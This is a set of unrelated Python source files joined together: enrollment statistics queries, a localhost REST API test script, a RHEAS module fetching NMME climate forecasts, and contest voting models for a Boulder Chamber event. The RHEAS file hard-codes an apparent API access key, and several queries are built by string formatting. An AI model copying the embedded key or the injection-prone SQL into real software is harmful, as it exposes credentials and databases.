        """Fetch and cache the per-school rows."""
        if not self._sc_list:
            self._sc_list = self.sc_query.all()
        return self._sc_list

    def __sc_sorted_by_enrollment__(self):
        """Return the rows sorted by descending enrollment (cached)."""
        if not self._sc_sorted_by_enrollment:
            rows = self.__sc_list__()
            rows.sort(key=lambda row: row.enrolled, reverse=True)
            self._sc_sorted_by_enrollment = rows
        return self._sc_sorted_by_enrollment

    def highest_enrolled_by_school(self):
        """Enrollment of the most-enrolled school, or None when no data."""
        rows = self.__sc_sorted_by_enrollment__()
        return rows[0].enrolled if rows else None

    def highest_enrolled_by_school_name(self):
        """Name of the most-enrolled school, or None when no data."""
        rows = self.__sc_sorted_by_enrollment__()
        return rows[0][1].name() if rows else None
class LocationBasicCourse(LocationSchool):
    """Basic-course enrollment statistics for a single location."""

    def __init__(self, bra_id):
        LocationSchool.__init__(self, bra_id)
        # Override the base query: total enrollment per basic course
        # (5-character course ids, excluding 'xx' placeholder ids).
        self.sc_query = db.session.query(
            func.sum(Ybsc.enrolled).label("enrolled"),
            Course_sc).join(Course_sc).filter(
                Ybsc.bra_id == self.bra_id,
                func.length(Ybsc.course_sc_id) == 5,
                not_(Ybsc.course_sc_id.like('xx%')),
                Ybsc.year == self.max_year_query).group_by(Ybsc.course_sc_id)

    def highest_enrolled_by_basic_course(self):
        """Enrollment of the most-enrolled basic course, or None."""
        rows = self.__sc_sorted_by_enrollment__()
        return rows[0].enrolled if rows else None

    def highest_enrolled_by_basic_course_name(self):
        """Name of the most-enrolled basic course, or None."""
        rows = self.__sc_sorted_by_enrollment__()
        return rows[0][1].name() if rows else None

    def year(self):
        """Most recent year with data for this location."""
        return self.max_year_query.first()[0]
| |
#!/usr/bin/python3
# coding: utf-8
import sys
import json
import requests
import pprint
import unittest
import string
import random
import os
import json
import time
import datetime
import base64
import uuid
import argparse
# Pretty-printer and CLI flag shared by the helpers below.
pp = pprint.PrettyPrinter(depth=6)
parser = argparse.ArgumentParser()
# NOTE(review): flag is spelled '--quite' (likely meant '--quiet');
# renaming would change the CLI, so it is kept as-is.
parser.add_argument('--quite',
                    help='Just print an OK at the end and fade out the printed data',
                    action='store_true')
args = parser.parse_args()
def pprnt(data):
    """Pretty-print *data* unless output is suppressed via --quite."""
    if not args.quite:
        pp.pprint(data)
def random_image():
    """Read data/plot.png (next to this script) and return it base64-encoded."""
    base_dir = os.path.dirname(os.path.realpath(__file__))
    with open(os.path.join(base_dir, 'data', 'plot.png'), "rb") as fh:
        return base64.b64encode(fh.read())
def encode_snippet():
    """Read data/snippet1.py (next to this script) and return it base64-encoded."""
    base_dir = os.path.dirname(os.path.realpath(__file__))
    with open(os.path.join(base_dir, 'data', 'snippet1.py'), "rb") as fh:
        return base64.b64encode(fh.read())
def random_id():
    """Return the first five characters of a fresh UUID4 string."""
    return str(uuid.uuid4())[:5]
def random_title(words):
    """Return a random title made of *words* space-separated words.

    Bug fix: the original immediately shadowed the *words* parameter
    with the word pool and always produced a single word regardless of
    the requested count.
    """
    pool = ['Foo', 'Bar', 'Linux', 'Something', 'Yeah', 'Nope', 'Random', "REST", "IPv6"]
    return ' '.join(random.choice(pool) for _ in range(words))
def random_result():
    """Return one of the possible result states at random."""
    return random.choice(['passed', 'failed', 'nonapplicable'])
def random_submitter():
    """Return a submitter name (currently the only choice is 'anonym')."""
    return random.choice(['anonym'])
def query_full(id, sub_id):
    """GET one object by id/sub-id and pretty-print the JSON reply."""
    url = 'http://localhost:8080/api/v1/object/{}/{}'.format(id, sub_id)
    headers = {'Content-type': 'application/json', 'Accept': 'application/json'}
    r = requests.get(url, data=''' ''', headers=headers)
    print("\nStatus Code:")
    print(r.status_code)
    print("\nRet Data:")
    pprnt(r.json())
def add_n(n):
    """POST *n* randomly generated objects, then list all objects.

    Returns the HTTP status code of the final listing request so the
    caller (the __main__ block) can report overall success.
    """
    url = 'http://localhost:8080/api/v1/object'
    headers = {'Content-type': 'application/json', 'Accept': 'application/json'}
    for i in range(n):
        data = dict()
        data["submitter"] = random_submitter()
        data["object-item"] = dict()
        data["object-item"]['categories'] = [ "team:orange", "topic:ip", "subtopic:route-cache" ]
        data["object-item"]['version'] = 0
        data['object-item']['title'] = "{}".format(random_title(3))
        data['object-item']['data'] = list()
        desc_data = dict()
        desc_data['type'] = 'description'
        desc_data['mime-type'] = 'text/markdown'
        # base64 requires a byte array for encoding -> .encode('utf-8')
        # json requires a string -> convert to UTF-8
        desc_data['data'] = base64.b64encode(
            """
# Rooter: A Methodology for the Typical Unification of Access Points and Redundancy #
Collaboratively administrate empowered **markets** via plug-and-play networks.
Dynamically procrastinate __B2C users__ after installed base benefits. Dramatically
visualize customer directed convergence without **revolutionary ROI**.
int foo(void) {
abort(0);
}
* Item1
* Item2
* Item3
Proctively envisioned multimedia based expertise and cross-media growth
strategies. Seamlessly visualize quality intellectual capital without superior
collaboration and idea-sharing. Holistically pontificate installed base portals
after maintainable products.

## Harnessing Byzantine Fault Tolerance Using Classical Theory ##
Efficiently unleash cross-media information without cross-media value. Quickly
maximize **timely deliverables** for real-time schemas. Dramatically maintain
clicks-and-mortar __solutions__ without functional solutions.
Completely synergize resource taxing relationships via premier niche markets.
Professionally cultivate one-to-one customer service with robust ideas.
Dynamically innovate resource-leveling customer service for state of the art
customer service.
+---------+
| | +--------------+
| NFS |--+ | |
| | | +-->| CacheFS |
+---------+ | +----------+ | | /dev/hda5 |
| | | | +--------------+
+---------+ +-->| | |
| | | |--+
| AFS |----->| FS-Cache |
| | | |--+
+---------+ +-->| | |
| | | | +--------------+
+---------+ | +----------+ | | |
| | | +-->| CacheFiles |
| ISOFS |--+ | /var/cache |
| | +--------------+
+---------+
Proctively envisioned multimedia based expertise and cross-media growth
strategies. Seamlessly visualize quality intellectual capital without superior
collaboration and idea-sharing. Holistically pontificate installed base portals
after maintainable products.
## Shizzle Dizzle Header Second Order ##
Proctively envisioned multimedia based expertise and cross-media growth
strategies. Seamlessly visualize quality intellectual capital without superior
collaboration and idea-sharing. Holistically pontificate installed base portals
after maintainable products.
""".encode('utf-8')).decode("utf-8")
        data['object-item']['data'].append(desc_data)
        img_data = dict()
        img_data['name'] = 'image.png'
        img_data['mime-type'] = 'image/png'
        img_data['data'] = random_image().decode("utf-8")
        data['object-item']['data'].append(img_data)
        img_data = dict()
        img_data['name'] = 'trace.pcap'
        img_data['mime-type'] = 'application/vnd.tcpdump.pcap'
        img_data['data'] = "R0lGODlhDwAPAKECAAAAzxzM/////wAAACwAAAAADwAPAAACIISPeQHsrZ5ModrLlN48CXF8m2iQ3YmmKqVlRtW4MLwWACH+H09wdGltaXplZCBieSBVbGVhZCBTbWFydFNhdmVyIQAAOw=="
        data['object-item']['data'].append(img_data)
        snippet_data = dict()
        snippet_data['name'] = 'snippet.py'
        snippet_data['image-name'] = None
        # how name for snippet-image implement?
        # snippet_data['image-name'] = None
        snippet_data['mime-type'] = 'x-snippet-python-matlplotlib-png'
        snippet_data['data'] = encode_snippet().decode('utf-8')
        data['object-item']['data'].append(snippet_data)
        data["attachment"] = dict()
        data["attachment"]['references'] = [ "doors:234236", "your-tool:4391843" ]
        data["attachment"]['tags'] = [ "ip", "route", "cache", "performance" ]
        data["attachment"]['responsible'] = random_submitter()
        # 1/4 of all achievements are anchored
        # add data entry to achievement, can be everything
        # starting from images, over log files to pcap files, ...
        if random.randint(0, 3) == 0:
            variety = dict()
            variety['os-version'] = 'rhel23'
            variety['platform'] = 'xeon-foo'
            # Bug fix: this was assigned to an undefined name
            # ('achievement'), raising NameError 1 in 4 runs. Attach the
            # metadata to the object being built instead.
            # TODO confirm the server expects it at the top level.
            data["variety"] = variety
        data["achievements"] = list()
        #os.system('cls' if os.name == 'nt' else 'clear')
        print("New Data:\n-----------\n")
        print(json.dumps(data, sort_keys=True, separators=(',', ': '), indent=4))
        print("\n-----------\n")
        dj = json.dumps(data, sort_keys=True, separators=(',', ': '))
        r = requests.post(url, data=dj, headers=headers)
        print("Return Data:\n-----------\n")
        ret_data = r.json()
        print(json.dumps(ret_data, sort_keys=True, separators=(',', ': '), indent=4))
        assert len(ret_data['data']['id']) > 0
        processing_time = ret_data['processing-time']
        sys.stderr.write("\nHTTPStatusCode: {} ServerProcTime {}s\n".format(r.status_code, processing_time))
        query_full(ret_data['data']['id'], ret_data['data']['sub_id'])
        time.sleep(1)
        print("\r\n\n")
        # Bug fix: a leftover sys.exit(0) here aborted the process, so the
        # listing below never ran and no status was ever returned.
    print("\r\n\n")
    url = 'http://localhost:8080/api/v1/objects'
    data = '''
    {
    "limit": 0,
    "ordering": "by-submitting-date-reverse",
    "maturity-level": "all"
    }
    '''
    headers = {'Content-type': 'application/json', 'Accept': 'application/json'}
    r = requests.get(url, data=data, headers=headers)
    print("\nStatus Code:")
    print(r.status_code)
    print("\nRet Data:")
    data = r.json()
    pprnt(data)
    return r.status_code
# Script entry point: create one object and report overall success
# based on the status of the final listing request.
if __name__ == '__main__':
    status = add_n(1)
    if status==200:
        print("OK")
    else:
        print("FAIL")
| |
""" RHEAS module for retrieving meteorological forecasts/hindcasts
from the NMME model suite.
.. module:: nmme
:synopsis: Retrieve NMME meteorological forecast data
.. moduleauthor:: Kostas Andreadis <kandread@jpl.nasa.gov>
"""
import datasets
import rpath
import dbio
import subprocess
import tempfile
import os
import sys
import shutil
import zipfile
import random
import string
import numpy as np
from datetime import datetime, timedelta
import logging
def dates(dbname):
    """Return the available dates for the NMME precipitation dataset."""
    return datasets.dates(dbname, "precip.nmme")
def _writeCservConfig(bbox, startdate, enddate, varname, ens):
"""Write ClimateSERV configuration file."""
log = logging.getLogger(__name__)
with tempfile.NamedTemporaryFile(dir=".", delete=False) as fcfg:
fcfg.write("[DEFAULT]\n")
fcfg.write("APIAccessKey = 1dd4d855e8b64a35b65b4841dcdbaa8b_as\n")
fcfg.write("DatasetType = Seasonal_Forecast\n")
fcfg.write("OperationType = Download\n")
fcfg.write("EarliestDate = {0}\n".format(startdate.strftime("%m/%d/%Y")))
if (enddate - startdate).days > 180:
enddate = startdate + timedelta(180)
log.warning("NMME forecast range cannot be longer than 180 days. Resetting end date!")
fcfg.write("LatestDate = {0}\n".format(enddate.strftime("%m/%d/%Y")))
fcfg.write("SeasonalEnsemble = ens{0:02d}\n".format(ens))
fcfg.write("SeasonalVariable = {0}\n".format(varname))
coords = "[{0},{1}],[{2},{1}],[{2},{3}],[{0},{3}],[{0},{1}]".format(*bbox)
fcfg.write("GeometryCoords = [{0}]\n".format(coords))
fcfg.write("BaseURL = https://climateserv.servirglobal.net/chirps/scriptAccess")
return fcfg.name
def _setEnsemble(dbname, sname, ens):
    """Set ensemble column in NMME data table.

    Adds an ``ensemble`` integer column to every resampled NMME table
    under schema *sname* (when missing) and stamps rows that have no
    ensemble yet with *ens*.
    """
    db = dbio.connect(dbname)
    cur = db.cursor()
    # All resampled raster tables registered for this schema.
    cur.execute("select * from raster_resampled where sname='{0}' and tname like 'nmme_%'".format(sname))
    tables = [r[1] for r in cur.fetchall()]
    for table in tables:
        if not dbio.columnExists(dbname, sname, table, "ensemble"):
            cur.execute("alter table {0}.{1} add column ensemble int".format(sname, table))
            db.commit()
        # Only rows from the most recent ingest still have NULL ensemble.
        sql = "update {0}.{1} set ensemble = {2} where ensemble is null".format(sname, table, ens)
        cur.execute(sql)
        db.commit()
    cur.close()
    db.close()
def ingest(dbname, varname, filename, dt, ens):
    """Imports Geotif *filename* into database *dbname*.

    :param varname: 'Precipitation' or 'Temperature' (mapped to a schema)
    :param dt: forecast date of the raster
    :param ens: ensemble member number stored with the raster
    """
    # Map ClimateSERV variable names to database schemas.
    schema = {'Precipitation': 'precip', 'Temperature': 'tmax'}
    db = dbio.connect(dbname)
    cur = db.cursor()
    # Create the nmme table on first ingest.
    cur.execute(
        "select * from information_schema.tables where table_schema='{0}' and table_name='nmme'".format(schema[varname]))
    if not bool(cur.rowcount):
        cur.execute("create table {0}.nmme (rid serial not null primary key, fdate date, ensemble int, rast raster)".format(
            schema[varname]))
        db.commit()
    # Replace any existing raster for this date/ensemble combination.
    cur.execute("select * from {0}.nmme where fdate='{1}' and ensemble = {2}".format(schema[varname], dt.strftime("%Y-%m-%d"), ens))
    if bool(cur.rowcount):
        cur.execute("delete from {0}.nmme where fdate='{1}' and ensemble = {2}".format(schema[varname], dt.strftime("%Y-%m-%d"), ens))
        db.commit()
    dbio.ingest(dbname, filename, dt, "{0}.nmme".format(schema[varname]), False, False)
    # Newly ingested rows have NULL ensemble; stamp them with *ens*.
    sql = "update {0}.nmme set ensemble = {1} where ensemble is null".format(schema[varname], ens)
    cur.execute(sql)
    db.commit()
    # Also refresh the resampled tiles for this date/ensemble.
    cur.execute("select * from raster_resampled where sname='{0}' and tname like 'nmme_%'".format(schema[varname]))
    tables = [r[1] for r in cur.fetchall()]
    for table in tables:
        cur.execute("select * from {0}.{1} where fdate='{2}' and ensemble = {3}".format(schema[varname], table, dt.strftime("%Y-%m-%d"), ens))
        if bool(cur.rowcount):
            cur.execute("delete from {0}.{1} where fdate='{2}' and ensemble = {3}".format(schema[varname], table, dt.strftime("%Y-%m-%d"), ens))
            db.commit()
    tilesize = (10, 10)
    dbio.createResampledTables(dbname, schema[varname], "nmme", dt, tilesize, False, "and ensemble={0}".format(ens))
    _setEnsemble(dbname, schema[varname], ens)
    cur.close()
    db.close()
def download(dbname, dts, bbox=None):
    """Downloads NMME ensemble forecast data from the SERVIR ClimateSERV
    data server, and imports them into the database *dbname*. Optionally uses
    a bounding box to limit the region with [minlon, minlat, maxlon, maxlat]."""
    log = logging.getLogger(__name__)
    nens = 10
    varnames = ["Precipitation", "Temperature"]
    outpath = tempfile.mkdtemp()
    for varname in varnames:
        for e in range(nens):
            configfile = _writeCservConfig(bbox, dts[0], dts[-1], varname, e+1)
            proc = subprocess.Popen(["python", "{0}/ClimateSERV_API_Access.py".format(rpath.scripts), "-config", configfile, "-outfile", "{0}/{1}_{2}.zip".format(outpath, varname, e+1)], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
            out, err = proc.communicate()
            log.debug(out)
            f = zipfile.ZipFile("{0}/{1}_{2}.zip".format(outpath, varname, e+1))
            # Bug fix: materialize as a list. Under Python 3 `filter`
            # returns an iterator which extractall() would exhaust,
            # leaving the loop below with nothing to process.
            filenames = [s for s in f.namelist() if s.endswith("tif")]
            f.extractall(outpath, filenames)
            for filename in filenames:
                # Forecast date is encoded in the filename suffix.
                dt = datetime.strptime(filename.split("_")[-1][1:-4], "%Y%m%d")
                if varname == "Temperature":
                    # convert from Kelvin to Celsius
                    proc = subprocess.Popen(["gdal_calc.py", "-A", "{0}/{1}".format(outpath, filename), "--calc=A-273.15", "--outfile={0}/C{1}".format(outpath, filename)])
                    out, err = proc.communicate()
                    log.debug(out)
                    filename = "C" + filename
                ingest(dbname, varname, "{0}/{1}".format(outpath, filename), dt, e+1)
            os.remove(configfile)
    shutil.rmtree(outpath)
def _queryDataset(dbname, tablename, name, startyear, startmonth, startday, endyear, endmonth, endday, ens=None):
    """Retrieve meteorological forcing dataset from database.

    Builds a temporary table mapping each basin pixel to raster
    coordinates, then samples *tablename* over the requested date range
    (optionally for one ensemble member). Returns a list of
    (gid, fdate, value) rows ordered by gid, then date.
    """
    # Random table name avoids collisions between concurrent queries.
    temptable = ''.join(random.SystemRandom().choice(string.ascii_letters) for _ in range(8))
    if ens is None:
        sql = "create table {0}_xy as (select gid,st_worldtorastercoordx(rast,geom) as x,st_worldtorastercoordy(rast,geom) as y,rid as tile from {4},{5}.basin where fdate=date'{1}-{2}-{3}' and st_intersects(rast,geom))".format(temptable, startyear, startmonth, startday, tablename, name)
    else:
        sql = "create table {0}_xy as (select gid,st_worldtorastercoordx(rast,geom) as x,st_worldtorastercoordy(rast,geom) as y,rid as tile from {4},{5}.basin where fdate=date'{1}-{2}-{3}' and st_intersects(rast,geom) and ensemble={6})".format(temptable, startyear, startmonth, startday, tablename, name, ens)
    db = dbio.connect(dbname)
    cur = db.cursor()
    cur.execute(sql)
    # Index on tile id speeds up the raster join below.
    cur.execute("create index {0}_xy_r on {0}_xy(tile)".format(temptable))
    db.commit()
    if ens is None:
        sql = "select gid,fdate,st_nearestvalue(rast,x,y) from {0},{1}_xy where rid=tile and fdate>=date'{2}-{3}-{4}' and fdate<=date'{5}-{6}-{7}' order by gid,fdate".format(tablename, temptable, startyear, startmonth, startday, endyear, endmonth, endday)
    else:
        sql = "select gid,fdate,st_nearestvalue(rast,x,y) from {0},{1}_xy where rid=tile and fdate>=date'{2}-{3}-{4}' and fdate<=date'{5}-{6}-{7}' and ensemble={8} order by gid,fdate".format(tablename, temptable, startyear, startmonth, startday, endyear, endmonth, endday, ens)
    cur.execute(sql)
    data = [r for r in cur.fetchall()]
    # Drop the temporary coordinate table before returning.
    cur.execute("drop table {0}_xy".format(temptable))
    db.commit()
    cur.close()
    db.close()
    return data
def _getForcings(options, models, res):
    """Retrieve meteorological forcings for ensemble.

    Queries NMME precipitation and mean temperature per ensemble member,
    then derives tmax/tmin by adding/subtracting half the diurnal range
    taken from a randomly chosen historical year; wind comes from the
    same historical year. Returns (prec, tmax, tmin, wind); all None
    when no usable historical years exist.
    """
    nens = len(models)
    db = dbio.connect(models.dbname)
    cur = db.cursor()
    rtables = dbio.getResampledTables(models.dbname, options, res)
    rsmp = rtables['precip'].split("_")[1]
    prec = [None] * nens
    tmax = [None] * nens
    tmin = [None] * nens
    temp = [None] * nens
    for e in range(nens):
        prec[e] = _queryDataset(models.dbname, "precip.nmme_{0}".format(rsmp), models.name, models.startyear, models.startmonth, models.startday, models.endyear, models.endmonth, models.endday, e+1)
        temp[e] = _queryDataset(models.dbname, "tmax.nmme_{0}".format(rsmp), models.name, models.startyear, models.startmonth, models.startday, models.endyear, models.endmonth, models.endday, e+1)
    sql = "select distinct(date_part('year',fdate)) from tmax.{0}".format(rtables['tmax'])
    cur.execute(sql)
    years = [r[0] for r in cur.fetchall()]
    # Drop the (possibly partial) first and last years.
    if len(years) > 2:
        years.remove(min(years))
        years.remove(max(years))
    if len(years) > 0:
        ndays = (datetime(models.endyear, models.endmonth, models.endday) - datetime(models.startyear, models.startmonth, models.startday)).days
        # Sample one historical year for diurnal range and wind.
        yr = int(np.random.choice(years))
        t0 = datetime(yr, models.startmonth, models.startday)
        t1 = t0 + timedelta(ndays)
        vtmax = _queryDataset(models.dbname, "tmax.{0}".format(rtables['tmax']), models.name, t0.year, t0.month, t0.day, t1.year, t1.month, t1.day)
        vtmin = _queryDataset(models.dbname, "tmin.{0}".format(rtables['tmin']), models.name, t0.year, t0.month, t0.day, t1.year, t1.month, t1.day)
        wind = _queryDataset(models.dbname, "wind.{0}".format(rtables['wind']), models.name, t0.year, t0.month, t0.day, t1.year, t1.month, t1.day)
        for e in range(nens):
            tmax[e] = [(vtmax[i][0], vtmax[i][1], temp[e][i][2] + 0.5 * (vtmax[i][2] - vtmin[i][2])) for i in range(len(vtmax))]
            tmin[e] = [(vtmin[i][0], vtmin[i][1], temp[e][i][2] - 0.5 * (vtmax[i][2] - vtmin[i][2])) for i in range(len(vtmin))]
    else:
        prec = tmax = tmin = wind = None
    # Bug fix: close the cursor/connection (previously leaked).
    cur.close()
    db.close()
    return prec, tmax, tmin, wind
def generate(options, models):
    """Generate meteorological forecast forcings from downscaled NMME data.

    Verifies that NMME precipitation covers the full forecast period,
    retrieves the ensemble forcings, and writes VIC forcing files for
    each ensemble member. Exits the process when data are missing.
    """
    log = logging.getLogger(__name__)
    # tmax/tmin both come from the configured temperature dataset.
    options['vic']['tmax'] = options['vic']['temperature']
    options['vic']['tmin'] = options['vic']['temperature']
    db = dbio.connect(models.dbname)
    cur = db.cursor()
    dt0 = datetime(models.startyear, models.startmonth, models.startday)
    dt1 = datetime(models.endyear, models.endmonth, models.endday)
    # check if forecast period exists in NMME data
    sql = "select count(distinct(fdate)) from precip.nmme where fdate>=date'{0}' and fdate<=date'{1}'".format(dt0.strftime("%Y-%m-%d"), dt1.strftime("%Y-%m-%d"))
    cur.execute(sql)
    ndata = cur.fetchone()[0]
    # Require one record per day in the forecast window.
    if ndata == (dt1 - dt0).days + 1:
        prec, tmax, tmin, wind = _getForcings(options, models, models.res)
        if tmax is None or tmin is None or wind is None:
            log.error("No data found to generate VIC forcings for NMME forecast. Exiting...")
            sys.exit()
        else:
            for e in range(len(models)):
                models[e].writeForcings(prec[e], tmax[e], tmin[e], wind)
    else:
        log.error("Not enough data found for requested forecast period! Exiting...")
        sys.exit()
    cur.close()
    db.close()
| |
# -*- coding: utf-8 -*-
""" contest models: Contest, Contestant, Donor, and Founder
:copyright: Copyright (c) 2014 Bivio Software, Inc. All Rights Reserved.
:license: Apache, see LICENSE for more details.
"""
import decimal
import flask
import random
import re
import sqlalchemy.orm
import string
import werkzeug.exceptions
from ..debug import pp_t
from .. import biv
from .. import common
from .. import controller as ppc
from ..contest import model as pcm
from ..auth import model as pam
from ..controller import db
from .. import ppdatetime
# Invitation templates for event voting: email subject/body and SMS body.
# Both bodies are .format()-ed with {contest} and/or {uri} at send time.
_SEND_INVITE_MAIL_SUBJECT = '2017 Esprit Venture Challenge Voting Link'
_SEND_INVITE_SMS_BODY = 'Vote at {contest} here: {uri}'
_SEND_INVITE_MAIL_BODY = '''Dear Esprit Entrepreneur Attendee:
Thank you for attending the Boulder Chamber's 33rd annual Esprit Entrepreneur
tonight. After the competition, please help choose the 2017 Esprit Venture
Challenge winner. Your personal voting link is:
{uri}
This link may only be used one time and will go live at 7:00pm.
Thank you for celebrating entrepreneurship in Boulder and helping select the winner
of the $10,000 prize. Any questions can be directed to Corine Waldau
at corine.waldau@boulderchamber.com.
Cheers,
Boulder Chamber Staff
'''
def is_email(v):
    """Heuristic for validated values: anything containing '@' is an email,
    which differentiates it from a phone number."""
    return v.find('@') != -1
def validate_email_or_phone(value):
    """Normalize *value* to an email or US phone; return (normalized, error).

    Exactly one element of the tuple is None: the error on success,
    the value on failure.
    """
    import pyisemail
    stripped = re.sub(r'\s+', '', value or '')
    if not stripped:
        return None, 'please enter an email or phone'
    if pyisemail.is_email(stripped):
        return stripped.lower(), None
    if is_email(stripped):
        # Contains '@' but failed full validation.
        return None, 'invalid email'
    digits = re.sub(r'\D', '', stripped)
    if len(digits) == 10:
        return '({}) {}-{}'.format(digits[0:3], digits[3:6], digits[6:]), None
    return None, 'invalid phone'
def _datetime_column():
    """Return a non-nullable, timezone-naive DateTime column."""
    return db.Column(db.DateTime(timezone=False), nullable=False)
class E15Contest(db.Model, pcm.ContestBase):
    """contest database model.

    Tracks the schedule for each contest phase (submission, public
    voting, judging, event voting) and provides reporting helpers for
    nominees and votes.
    """
    biv_id = db.Column(
        db.Numeric(18),
        db.Sequence('e15contest_s', start=1015, increment=1000),
        primary_key=True
    )
    time_zone = db.Column(db.String, nullable=False)
    event_voting_end = _datetime_column()
    event_voting_start = _datetime_column()
    judging_end = _datetime_column()
    judging_start = _datetime_column()
    public_voting_end = _datetime_column()
    public_voting_start = _datetime_column()
    submission_end = _datetime_column()
    submission_start = _datetime_column()

    def contest_info(self):
        """Return display-state flags and counts derived from the schedule."""
        winner = self._winner_biv_id()
        # TODO: check to make sure show*/is* aren't conflicting (one second overlap)
        # need to detect transtions. If there are no finalists, but showFinalists, then
        # compute finalists. Probably just want this on any contest page.
        semiFinalistCount = self._count(E15Nominee.is_semi_finalist)
        finalistCount = self._count(E15Nominee.is_finalist)
        return {
            'contestantCount': len(self.public_nominees()),
            'displayName': self.display_name,
            'finalistCount': finalistCount,
            'isEventRegistration': ppdatetime.now_in_range(self.submission_start, self.event_voting_end),
            'isEventVoting': self.is_event_voting(),
            'isExpired': self.is_expired(),
            'isJudging': self.is_judging(),
            'isNominating': self.is_nominating(),
            'isPreNominating': ppdatetime.now_before_start(self.submission_start),
            'isPublicVoting': self.is_public_voting(),
            'semiFinalistCount': semiFinalistCount,
            'showAllContestants': ppdatetime.now_in_range(self.submission_start, self.public_voting_end),
            'showFinalists': ppdatetime.now_in_range(self.judging_end, self.event_voting_end) and finalistCount > 0,
            'showSemiFinalists': ppdatetime.now_in_range(self.public_voting_end, self.judging_end) and semiFinalistCount > 0,
            'showWinner': bool(winner),
            'winner_biv_id': winner,
        }

    def get_finalists(self):
        """Return finalist nominees ordered by display name."""
        return E15Nominee.query.select_from(pam.BivAccess).filter(
            pam.BivAccess.source_biv_id == self.biv_id,
            pam.BivAccess.target_biv_id == E15Nominee.biv_id,
            E15Nominee.is_finalist == True,
        ).order_by(E15Nominee.display_name).all()

    def is_event_voting(self):
        """True while event voting is open."""
        return ppdatetime.now_in_range(self.event_voting_start, self.event_voting_end)

    def is_expired(self):
        """True after event voting has ended."""
        return ppdatetime.now_after_end(self.event_voting_end)

    def is_judge(self):
        """True only while judging is active and the base check passes."""
        if self.is_judging():
            return super(E15Contest, self).is_judge()
        return False

    def is_judging(self):
        """True while the judging phase is open."""
        return ppdatetime.now_in_range(self.judging_start, self.judging_end)

    def is_nominating(self):
        """True while the submission phase is open."""
        return ppdatetime.now_in_range(self.submission_start, self.submission_end)

    def is_public_voting(self):
        """True while public voting is open."""
        return ppdatetime.now_in_range(self.public_voting_start, self.public_voting_end)

    def is_semi_finalist_submitter(self):
        """True when the logged-in user submitted a semi-finalist."""
        return len(E15Contest.semi_finalist_nominees_for_user(self)) > 0

    def nominee_pending_for_user(self):
        """Return (nominee, True) for the user's pending application,
        or (new empty nominee, False) when none is pending."""
        access_alias = sqlalchemy.orm.aliased(pam.BivAccess)
        for n in E15Nominee.query.select_from(pam.BivAccess, access_alias).filter(
            pam.BivAccess.source_biv_id == self.biv_id,
            pam.BivAccess.target_biv_id == E15Nominee.biv_id,
            pam.BivAccess.target_biv_id == access_alias.target_biv_id,
            access_alias.source_biv_id == flask.session['user.biv_id'],
        ).all():
            # Only should be one public application at a time
            if not (n.is_valid and n.is_public):
                return n, True
        return E15Nominee(), False

    def public_nominees(self):
        """Return all public nominees for this contest."""
        return E15Nominee.query.select_from(pam.BivAccess).filter(
            pam.BivAccess.source_biv_id == self.biv_id,
            pam.BivAccess.target_biv_id == E15Nominee.biv_id,
            E15Nominee.is_public == True,
        ).all()

    def semi_finalist_nominees_for_user(self):
        """Semi-finalist nominees submitted by the logged-in user."""
        if not flask.session.get('user.is_logged_in'):
            return []
        access_alias = sqlalchemy.orm.aliased(pam.BivAccess)
        return E15Nominee.query.select_from(pam.BivAccess, access_alias).filter(
            pam.BivAccess.source_biv_id == self.biv_id,
            pam.BivAccess.target_biv_id == E15Nominee.biv_id,
            pam.BivAccess.target_biv_id == access_alias.target_biv_id,
            access_alias.source_biv_id == flask.session['user.biv_id'],
            E15Nominee.is_semi_finalist == True,
        ).all()

    def tally_all_scores(self):
        """Return per-nominee vote counts and judge-rank scores.

        Bug fix: this method was defined twice with identical bodies
        (the second definition silently shadowed the first); the
        duplicate was removed, along with unused total accumulators.
        """
        res = []
        for nominee in self.public_nominees():
            ranks = nominee.get_judge_ranks()
            res.append({
                'biv_id': nominee.biv_id,
                'display_name': nominee.display_name,
                'judge_ranks': '( {} )'.format(', '.join(map(str, ranks))),
                'votes': nominee.tally_votes(),
                'judge_score': nominee.tally_judge_ranks(),
            })
        return res

    def admin_event_votes(self):
        """Summarize event votes per finalist for the admin report."""
        nominees = {}
        for f in self.get_finalists():
            nominees[f.biv_id] = dict(
                display_name=f.display_name,
                count=0,
            )
        votes = []
        total_votes = 0
        total_votes_used = 0
        for vae in E15VoteAtEvent.query.filter(
            E15VoteAtEvent.contest_biv_id == self.biv_id,
        ).order_by(
            E15VoteAtEvent.invite_email_or_phone,
        ).all():
            v = dict(invite_email_or_phone=vae.invite_email_or_phone, nominee='')
            total_votes += 1
            if vae.nominee_biv_id:
                total_votes_used += 1
                n = nominees[vae.nominee_biv_id]
                n['count'] += 1
                v['nominee'] = n['display_name']
            votes.append(v)
        return dict(
            nominees=sorted(
                nominees.values(),
                key=lambda x: x['count'],
                reverse=True,
            ),
            total_votes=total_votes,
            total_votes_used=total_votes_used,
            votes=votes,
            contest=self.display_name,
        )

    def _count(self, field):
        """Count nominees in this contest where boolean *field* is true."""
        return E15Nominee.query.select_from(pam.BivAccess).filter(
            pam.BivAccess.source_biv_id == self.biv_id,
            pam.BivAccess.target_biv_id == E15Nominee.biv_id,
            field == True,
        ).count()

    def _winner_biv_id(self):
        """biv_id of the winning nominee, or None when not yet chosen."""
        res = E15Nominee.query.select_from(pam.BivAccess).filter(
            pam.BivAccess.source_biv_id == self.biv_id,
            pam.BivAccess.target_biv_id == E15Nominee.biv_id,
            E15Nominee.is_winner == True,
        ).first()
        return res.biv_id if res else None
class E15EventVoter(db.Model, common.ModelWithDates):
    """event voter database model.

    One row per (contest, voter email); records the chosen nominee.
    """
    __tablename__ = 'e15_event_voter'
    # Contest being voted in (part of the composite primary key).
    contest_biv_id = db.Column(db.Numeric(18), primary_key=True)
    user_email = db.Column(db.String(100), nullable=False, primary_key=True)
    # Nominee chosen by this voter; NULL until a vote is cast.
    nominee_biv_id = db.Column(db.Numeric(18))
class E15Nominee(db.Model, pcm.NomineeBase):
    """Nominee database model for the E15 contest."""
    biv_id = db.Column(
        db.Numeric(18),
        db.Sequence('e15nominee_s', start=1016, increment=1000),
        primary_key=True
    )
    is_valid = db.Column(db.Boolean, nullable=False)
    youtube_code = db.Column(db.String(500))
    contact_phone = db.Column(db.String(20))
    contact_address = db.Column(db.String(100))
    nominee_desc = db.Column(db.String)
    is_semi_finalist = db.Column(db.Boolean, nullable=False)
    is_finalist = db.Column(db.Boolean, nullable=False)
    is_winner = db.Column(db.Boolean, nullable=False)

    def assert_is_public_or_404(self):
        """Abort with 404 unless this nominee is public."""
        if not self.is_public:
            werkzeug.exceptions.abort(404)

    def contest(self):
